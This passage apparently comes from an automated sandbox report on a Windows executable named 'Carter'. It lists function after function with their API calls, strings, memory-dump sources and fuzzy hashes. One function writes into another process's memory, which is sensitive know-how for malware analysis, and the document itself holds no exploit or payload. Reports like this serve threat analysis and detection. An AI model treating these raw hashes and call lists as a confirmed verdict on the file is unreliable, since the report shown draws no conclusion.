                                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 01038D49
                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 01038D58
                                                                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 01038D5F
                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 01038D75
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                        • String ID:
                                                                        • API String ID: 44706859-0
                                                                        • Opcode ID: c26739b6501d21fbbc69c7fa6464fec8f45026aca436f2114c316a5175beff28
                                                                        • Instruction ID: 4ad1e99732e361c9b4de5ab9f902157c8c424d136bc2f94dc548e3a28c539c87
                                                                        • Opcode Fuzzy Hash: c26739b6501d21fbbc69c7fa6464fec8f45026aca436f2114c316a5175beff28
                                                                        • Instruction Fuzzy Hash: 9FF0AF30200204AFEB621EA8EC8CE673BACEF8A654F044266F984D6144CB669900DB60
                                                                        Function 01038CC7 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 01038CDE
                                                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 01038CE8
                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 01038CF7
                                                                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 01038CFE
                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 01038D14
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                        • String ID:
                                                                        • API String ID: 44706859-0
                                                                        • Opcode ID: c206579b011d52bdb7f9e2763a26ffecee3fb314492d8cf416f620b9421ad8e8
                                                                        • Instruction ID: 19c60625bfc2eb8541928b358e7f746dfd6f3a126784e5954d64c7edd3b33e73
                                                                        • Opcode Fuzzy Hash: c206579b011d52bdb7f9e2763a26ffecee3fb314492d8cf416f620b9421ad8e8
                                                                        • Instruction Fuzzy Hash: 02F0AF30200204AFEF611EA8AC8CE673BACEF8A654F108666F984D2144CA66D800DB60
                                                                        Function 0103CD7C Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,000003E9), ref: 0103CD90
                                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 0103CDA7
                                                                        • MessageBeep.USER32(00000000), ref: 0103CDBF
                                                                        • KillTimer.USER32(?,0000040A), ref: 0103CDDB
                                                                        • EndDialog.USER32(?,00000001), ref: 0103CDF5
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                        • String ID:
                                                                        • API String ID: 3741023627-0
                                                                        • Opcode ID: e5e416825de67094379fc5e5ed8d1dff03a4fd660ff6f34521a1a37752b50989
                                                                        • Instruction ID: 5feb94e10ed54f95f01a0ef6752dc4f8e189929424b28212fd22523fe794b828
                                                                        • Opcode Fuzzy Hash: e5e416825de67094379fc5e5ed8d1dff03a4fd660ff6f34521a1a37752b50989
                                                                        • Instruction Fuzzy Hash: B3018F70900708ABFB316B24DE5EBA67BACBB45701F00069AF6C2B10D5DBE5A544CB80
                                                                        Function 00FE178C Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • EndPath.GDI32(?), ref: 00FE179B
                                                                        • StrokeAndFillPath.GDI32(?,?,0101BBC9,00000000,?), ref: 00FE17B7
                                                                        • SelectObject.GDI32(?,00000000), ref: 00FE17CA
                                                                        • DeleteObject.GDI32 ref: 00FE17DD
                                                                        • StrokePath.GDI32(?), ref: 00FE17F8
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                        • String ID:
                                                                        • API String ID: 2625713937-0
                                                                        • Opcode ID: ea0711aa35bb5c6f2f20e175c6412c5dc227ad15223f6585b311a93b4cf87033
                                                                        • Instruction ID: 927e33843b550ef56f94d03ce123c8043cc30d6e82a54ac7969a2f94f47fea68
                                                                        • Opcode Fuzzy Hash: ea0711aa35bb5c6f2f20e175c6412c5dc227ad15223f6585b311a93b4cf87033
                                                                        • Instruction Fuzzy Hash: 99F01931440A48ABDB325F27E80CB593BA5B701732F54C314F4A9541E8D73B4995EF50
                                                                        Function 0104C9DA Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CoInitialize.OLE32(00000000), ref: 0104CA75
                                                                        • CoCreateInstance.OLE32(01073D3C,00000000,00000001,01073BAC,?), ref: 0104CA8D
                                                                          • Part of subcall function 00FF1A36: _memmove.LIBCMT ref: 00FF1A77
                                                                        • CoUninitialize.OLE32 ref: 0104CCFA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                        • String ID: .lnk
                                                                        • API String ID: 2683427295-24824748
                                                                        • Opcode ID: f580b9a0fee65e7e30bea679dafc1a8441ae58d6cfcb99baf8c687b7d2605e04
                                                                        • Instruction ID: 82a884514b3c909b33e1e1a3de8fb57f4bb840ca3a62945483c490cdf736a433
                                                                        • Opcode Fuzzy Hash: f580b9a0fee65e7e30bea679dafc1a8441ae58d6cfcb99baf8c687b7d2605e04
                                                                        • Instruction Fuzzy Hash: 98A13BB1504245AFD310EF64CC81EABB7E8FF94714F00491CF5959B2A2EB75EA09CB92
                                                                        Function 00FEE3C6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 01000FE6: std::exception::exception.LIBCMT ref: 0100101C
                                                                          • Part of subcall function 01000FE6: __CxxThrowException@8.LIBCMT ref: 01001031
                                                                          • Part of subcall function 00FF1A36: _memmove.LIBCMT ref: 00FF1A77
                                                                          • Part of subcall function 00FF1680: _memmove.LIBCMT ref: 00FF16DB
                                                                        • __swprintf.LIBCMT ref: 00FEE598
                                                                        Strings
                                                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00FEE431
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                        • API String ID: 1943609520-557222456
                                                                        • Opcode ID: 02fa231012bc6a25ab9298bb7bdd2ef2d551632544e2799075a303662945d567
                                                                        • Instruction ID: 550f859a4b2efde0cfeab132d6341efd1a81575d09baa06f6d03a50d15c1024f
                                                                        • Opcode Fuzzy Hash: 02fa231012bc6a25ab9298bb7bdd2ef2d551632544e2799075a303662945d567
                                                                        • Instruction Fuzzy Hash: 1E919B715083559FD724EF24EC85CBEB7A8BF95310F04091DF6869B2A1EA34EA04DB92
                                                                        Function 0100523D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __startOneArgErrorHandling.LIBCMT ref: 010052CD
                                                                          • Part of subcall function 01010320: __87except.LIBCMT ref: 0101035B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorHandling__87except__start
                                                                        • String ID: pow
                                                                        • API String ID: 2905807303-2276729525
                                                                        • Opcode ID: 3c2555f36f42ae1a1169108cc29bb9128de172f38d636ac2a6af890ec7ead55d
                                                                        • Instruction ID: b930885f3af17a38331f84702f398b49358d38b49c7422343e187b3cbc83ea26
                                                                        • Opcode Fuzzy Hash: 3c2555f36f42ae1a1169108cc29bb9128de172f38d636ac2a6af890ec7ead55d
                                                                        • Instruction Fuzzy Hash: 785124B1E4920697FB63A61CCD803AE7BD49B01710F20C9A9F4C5862DDEE7D84D48F46
                                                                        Function 01000654 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: #$+
                                                                        • API String ID: 0-2552117581
                                                                        • Opcode ID: 57e9978b51d069e840c2a1217de941a37af800aec3aabc8ef1f3bf01b4ab9e7c
                                                                        • Instruction ID: f283aaf4433d5842e0e87a262a58a88693bba7bce4c05daf59e32ae7c83034c5
                                                                        • Opcode Fuzzy Hash: 57e9978b51d069e840c2a1217de941a37af800aec3aabc8ef1f3bf01b4ab9e7c
                                                                        • Instruction Fuzzy Hash: DE5114B5904255EFEB16DF1CC840AFA7BE8BF99310F140195F9C19B2D0D73A9A42CB60
                                                                        Function 00FFCF0C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: _memset$_memmove
                                                                        • String ID: ERCP
                                                                        • API String ID: 2532777613-1384759551
                                                                        • Opcode ID: 17afba1d963f3d9549d18d06e3caff4b4e2bff1a6e31f83616fdf7c70bbd0178
                                                                        • Instruction ID: 6607a5903b73ecdfeceed9255086234142f908984a26164136ca55b76cbcd45d
                                                                        • Opcode Fuzzy Hash: 17afba1d963f3d9549d18d06e3caff4b4e2bff1a6e31f83616fdf7c70bbd0178
                                                                        • Instruction Fuzzy Hash: EE51C471D003099BDB24CF65C8907AABBE9EF48314F14856EE68ADB294E7349581DB90
                                                                        Function 0103A3AD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 01041CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,01039E4E,?,?,00000034,00000800,?,00000034), ref: 01041CE5
                                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0103A3F7
                                                                          • Part of subcall function 01041C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,01039E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 01041CB0
                                                                          • Part of subcall function 01041BDD: GetWindowThreadProcessId.USER32(?,?), ref: 01041C08
                                                                          • Part of subcall function 01041BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,01039E12,00000034,?,?,00001004,00000000,00000000), ref: 01041C18
                                                                          • Part of subcall function 01041BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,01039E12,00000034,?,?,00001004,00000000,00000000), ref: 01041C2E
                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0103A464
                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0103A4B1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                        • String ID: @
                                                                        • API String ID: 4150878124-2766056989
                                                                        • Opcode ID: ff741058f9106baee68c28316fad3a1abcb82bf5339f71b9131dbc1ec4fa1037
                                                                        • Instruction ID: d304a4f1a0324e7b27cb4cdae5242190845fdee3c084dc964e0d21a8169561e3
                                                                        • Opcode Fuzzy Hash: ff741058f9106baee68c28316fad3a1abcb82bf5339f71b9131dbc1ec4fa1037
                                                                        • Instruction Fuzzy Hash: 24415E72A0021DBFDB10DBA4CC85ADEBBB8EF59700F104195FA85B7180DA716E85CBA1
                                                                        Function 010679FE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 01067A86
                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 01067A9A
                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 01067ABE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window
                                                                        • String ID: SysMonthCal32
                                                                        • API String ID: 2326795674-1439706946
                                                                        • Opcode ID: 1a4155089faf45ec12aa1e80657b72e5cf89a4bdb223a97d273ff568d24ed06d
                                                                        • Instruction ID: df4497775a097a7c4f8b9a4549f5a0b8771820bd6d572f1f0ddc824579b539c7
                                                                        • Opcode Fuzzy Hash: 1a4155089faf45ec12aa1e80657b72e5cf89a4bdb223a97d273ff568d24ed06d
                                                                        • Instruction Fuzzy Hash: D221B732610219BFDF258E94CC41FEE3BA9EF88714F150254FE557B1C0D675A950DB90
                                                                        Function 010681B8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0106826F
                                                                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0106827D
                                                                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01068284
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$DestroyWindow
                                                                        • String ID: msctls_updown32
                                                                        • API String ID: 4014797782-2298589950
                                                                        • Opcode ID: ee431bf2ce7135eda4d565205b22b6f7f7db610a4ca77c1acd98503b0983daa8
                                                                        • Instruction ID: 3e6fd9e2d8e23d480dca8b4b9b0e2859cd150cdff015d5c2daf86095cb304d13
                                                                        • Opcode Fuzzy Hash: ee431bf2ce7135eda4d565205b22b6f7f7db610a4ca77c1acd98503b0983daa8
                                                                        • Instruction Fuzzy Hash: 8E21B2B1600209AFEB51DF58CC81DB737EDFB4A354B044149FA419B251CB75EC01CBA0
                                                                        Function 010672D5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 01067360
                                                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 01067370
                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 01067395
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$MoveWindow
                                                                        • String ID: Listbox
                                                                        • API String ID: 3315199576-2633736733
                                                                        • Opcode ID: 77d3965fa4185dde118f5850223b749248470f8ef5c74cbe4f9a27b8f33be09a
                                                                        • Instruction ID: be92ae5ccb0f362f4efdd8588ca94c5f177e63b47a595707982ad50223e56a4b
                                                                        • Opcode Fuzzy Hash: 77d3965fa4185dde118f5850223b749248470f8ef5c74cbe4f9a27b8f33be09a
                                                                        • Instruction Fuzzy Hash: DC21C532600118BFDF528F58CC45EBF37AEEB89754F11C124F9809B190D6719C518BA0
                                                                        Function 01067D33 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 01067D97
                                                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 01067DAC
                                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 01067DB9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: msctls_trackbar32
                                                                        • API String ID: 3850602802-1010561917
                                                                        • Opcode ID: 8fd1f8ac9229fee432c55eca7ca59d18a9762cc5dd6957bb99778c4b5e9e41cc
                                                                        • Instruction ID: 1507c0c4b2df1954a69a1648a7a4d32b178406a80f4151bb523a415c594c9848
                                                                        • Opcode Fuzzy Hash: 8fd1f8ac9229fee432c55eca7ca59d18a9762cc5dd6957bb99778c4b5e9e41cc
                                                                        • Instruction Fuzzy Hash: 5F110A72240208BFDF216E65CC45FEB7BADEF89B18F114518FB81A60D0D672D411DB20
                                                                        Function 0105C6D9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,0102027A,?), ref: 0105C6E7
                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0105C6F9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                        • API String ID: 2574300362-1816364905
                                                                        • Opcode ID: b41fa3a92fdb40329000057feba41bb9cd44cf268eed978b19bce05162abcc11
                                                                        • Instruction ID: fa36d09426455e5f8989b0ca6bf68fa8a4fa67e45ab8b0e8d5d03459a41e16f2
